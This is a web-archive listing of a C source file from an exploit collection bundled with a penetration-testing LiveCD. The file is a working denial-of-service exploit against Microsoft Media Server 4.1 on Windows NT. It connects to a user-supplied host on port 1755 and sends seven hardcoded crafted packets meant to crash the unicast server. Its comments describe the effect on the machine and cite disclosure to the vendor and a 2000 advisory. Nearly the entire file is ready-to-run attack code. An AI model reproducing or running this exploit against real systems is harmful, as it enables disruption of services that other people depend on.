home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / media / players / mmsu-dos.c < prev   
C/C++ Source or Header  |  2005-02-12  |  6KB  |  156 lines

  1. /*
  2.  *
  3.  * Microsoft Media Server 4.1 - Denial of Service Attack
  4.  *
  5.  * This code will crash the Microsoft Media Unicast Server for
  6.  * Windows NT.  We have tested this against machines running SP4
  7.  * and SP6.
  8.  *
  9.  * We have seen the entire machine become very unstable following
  10.  * the crash of the unicast server.
  11.  *
  12.  * Notified secure@microsoft.com Jan-18-2000 at 11:30 AM.
  13.  * Microsoft advisory released Feb-23-2000.
  14.  *
  15.  * http://www.microsoft.com/technet/security/bulletin/fq00-013.asp
  16.  *
  17.  */
  18.  
  19. #include <stdio.h>
  20. #include <netinet/in.h>
  21. #include <sys/types.h>
  22. #include <sys/socket.h>
  23. #include <netdb.h>
  24. #include <arpa/inet.h>
  25. #include <string.h>
  26. #include <unistd.h>
  27.  
  28. char packet1[] = {
  29.   0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0xa0, 0x00, 0x00, 0x00,
  30.   0x4d, 0x4d, 0x53, 0x20, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  31.   0xf8, 0x53, 0xe3, 0xa5, 0x9b, 0xc4, 0x00, 0x40, 0x12, 0x00, 0x00, 0x00,
  32.   0x01, 0x00, 0x03, 0x00, 0xf0, 0xf0, 0xf0, 0xf0, 0x0b, 0x00, 0x04, 0x00,
  33.   0x1c, 0x00, 0x03, 0x00, 0x4e, 0x00, 0x53, 0x00, 0x50, 0x00, 0x6c, 0x00,
  34.   0x61, 0x00, 0x79, 0x00, 0x65, 0x00, 0x72, 0x00, 0x2f, 0x00, 0x34, 0x00,
  35.   0x2e, 0x00, 0x31, 0x00, 0x2e, 0x00, 0x30, 0x00, 0x2e, 0x00, 0x33, 0x00,
  36.   0x38, 0x00, 0x35, 0x00, 0x37, 0x00, 0x3b, 0x00, 0x20, 0x00, 0x7b, 0x00,
  37.   0x30, 0x00, 0x32, 0x00, 0x64, 0x00, 0x30, 0x00, 0x63, 0x00, 0x32, 0x00,
  38.   0x63, 0x00, 0x30, 0x00, 0x2d, 0x00, 0x62, 0x00, 0x35, 0x00, 0x30, 0x00,
  39.   0x37, 0x00, 0x2d, 0x00, 0x31, 0x00, 0x31, 0x00, 0x64, 0x00, 0x32, 0x00,
  40.   0x2d, 0x00, 0x39, 0x00, 0x61, 0x00, 0x61, 0x00, 0x38, 0x00, 0x2d, 0x00,
  41.   0x62, 0x00, 0x37, 0x00, 0x30, 0x00, 0x66, 0x00, 0x33, 0x00, 0x30, 0x00,
  42.   0x34, 0x00, 0x34, 0x00, 0x61, 0x00, 0x65, 0x00, 0x37, 0x00, 0x65, 0x00,
  43.   0x7d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
  44. };
  45.  
  46. char packet2[] = {
  47.   0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x20, 0x00, 0x00, 0x00,
  48.   0x4d, 0x4d, 0x53, 0x20, 0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
  49.   0x5e, 0xba, 0x49, 0x0c, 0x02, 0x2b, 0x01, 0x40, 0x02, 0x00, 0x00, 0x00,
  50.   0x18, 0x00, 0x03, 0x00, 0xf1, 0xf0, 0xf0, 0xf0, 0x0b, 0x00, 0x04, 0x00
  51. };
  52.  
  53. char packet3[] = {
  54.   0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x60, 0x00, 0x00, 0x00,
  55.   0x4d, 0x4d, 0x53, 0x20, 0x0c, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
  56.   0x83, 0xc0, 0xca, 0xa1, 0x45, 0xb6, 0x01, 0x40, 0x0a, 0x00, 0x00, 0x00,
  57.   0x02, 0x00, 0x03, 0x00, 0xf1, 0xf0, 0xf0, 0xf0, 0xff, 0xff, 0xff, 0xff,
  58.   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xa0, 0x00, 0x02, 0x00, 0x00, 0x00,
  59.   0x5c, 0x00, 0x5c, 0x00, 0x31, 0x00, 0x39, 0x00, 0x32, 0x00, 0x2e, 0x00,
  60.   0x31, 0x00, 0x36, 0x00, 0x38, 0x00, 0x2e, 0x00, 0x30, 0x00, 0x2e, 0x00,
  61.   0x32, 0x00, 0x5c, 0x00, 0x54, 0x00, 0x43, 0x00, 0x50, 0x00, 0x5c, 0x00,
  62.   0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x00, 0x00, 0x32, 0x00,
  63.   0x63, 0x00, 0x30, 0x00
  64. };
  65.  
  66.  
  67. char packet4[] = {
  68.   0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x88, 0x00, 0x00, 0x00,
  69.   0x4d, 0x4d, 0x53, 0x20, 0x11, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00,
  70.   0x2b, 0x87, 0x16, 0xd9, 0xce, 0xf7, 0x01, 0x40, 0x0f, 0x00, 0x00, 0x00,
  71.   0x05, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff,
  72.   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x54, 0x00, 0x68, 0x00,
  73.   0x65, 0x00, 0x20, 0x00, 0x45, 0x00, 0x61, 0x00, 0x67, 0x00, 0x6c, 0x00,
  74.   0x65, 0x00, 0x73, 0x00, 0x20, 0x00, 0x54, 0x00, 0x65, 0x00, 0x71, 0x00,
  75.   0x75, 0x00, 0x69, 0x00, 0x6c, 0x00, 0x61, 0x00, 0x20, 0x00, 0x53, 0x00,
  76.   0x75, 0x00, 0x6e, 0x00, 0x72, 0x00, 0x69, 0x00, 0x73, 0x00, 0x65, 0x00,
  77.   0x20, 0x00, 0x32, 0x00, 0x38, 0x00, 0x6b, 0x00, 0x2f, 0x00, 0x65, 0x00,
  78.   0x61, 0x00, 0x67, 0x00, 0x6c, 0x00, 0x65, 0x00, 0x73, 0x00, 0x32, 0x00,
  79.   0x38, 0x00, 0x2e, 0x00, 0x61, 0x00, 0x73, 0x00, 0x66, 0x00, 0x00, 0x00,
  80.   0x62, 0x00, 0x37, 0x00, 0x30, 0x00, 0x66, 0x00
  81. };
  82.  
  83. char packet5[] = {
  84.   0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x48, 0x00, 0x00, 0x00,
  85.   0x4d, 0x4d, 0x53, 0x20, 0x09, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
  86.   0x67, 0x66, 0x66, 0x66, 0x66, 0x66, 0x02, 0x40, 0x07, 0x00, 0x00, 0x00,
  87.   0x15, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  88.   0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff,
  89.   0x65, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  90.   0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0xac, 0x40, 0x02, 0x00, 0x00, 0x00,
  91.   0x00, 0x00, 0x00, 0x00
  92. };
  93.  
  94. char packet6[] = {
  95.   0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x30, 0x00, 0x00, 0x00,
  96.   0x4d, 0x4d, 0x53, 0x20, 0x06, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
  97.   0x0a, 0xd7, 0xa3, 0x70, 0x3d, 0x0a, 0x11, 0x40, 0x04, 0x00, 0x00, 0x00,
  98.   0x33, 0x00, 0x03, 0x00, 0x02, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00,
  99.   0x00, 0x00, 0xff, 0xff, 0x02, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff,
  100.   0x65, 0x00, 0x20, 0x00
  101. };
  102.  
  103. char packet7[] = {
  104.   0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x38, 0x00, 0x00, 0x00,
  105.   0x4d, 0x4d, 0x53, 0x20, 0x07, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00,
  106.   0x2f, 0xdd, 0x24, 0x06, 0x81, 0x15, 0x11, 0x40, 0x05, 0x00, 0x00, 0x00,
  107.   0x07, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00,
  108.   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff,
  109.   0xff, 0xff, 0xff, 0xff, 0x16, 0xca, 0x03, 0x80, 0x04, 0x00, 0x00, 0x00
  110. };
  111.  
  112. int sock;
  113.  
  114. int main(int argc, char *argv[])
  115. {
  116.   struct hostent *he;
  117.   struct sockaddr_in sa;
  118.   char buf[1024];
  119.  
  120.   if (argc != 2)
  121.     {
  122.       fprintf(stderr, "usage: %s <host/ip>\n", argv[0]);
  123.       return(-1);
  124.     }
  125.  
  126.   sock = socket ( AF_INET, SOCK_STREAM, 0);
  127.   sa.sin_family = AF_INET;
  128.   sa.sin_port = htons(1755);
  129.   he = gethostbyname (argv[1]);
  130.   if (!he)
  131.     {
  132.       if ((sa.sin_addr.s_addr = inet_addr(argv[1])) == INADDR_NONE)
  133.         return(-1);
  134.     }
  135.   else
  136.     {
  137.       bcopy(he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length);
  138.     }
  139.   if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
  140.     {
  141.       fprintf(stderr, "Fatal Error: Can't connect to Microsoft Media Server.\n");
  142.       return(-1);
  143.     }
  144.   write(sock, packet1, sizeof(packet1));
  145.   write(sock, packet2, sizeof(packet2));
  146.   write(sock, packet3, sizeof(packet3));
  147.   write(sock, packet4, sizeof(packet4));
  148.   write(sock, packet5, sizeof(packet5));
  149.   write(sock, packet6, sizeof(packet6));
  150.   write(sock, packet7, sizeof(packet7));
  151.   for (;;)
  152.     {
  153.       read(sock, buf, sizeof(buf));
  154.     }
  155. }
  156. /*                    www.hack.co.za              [2000]*/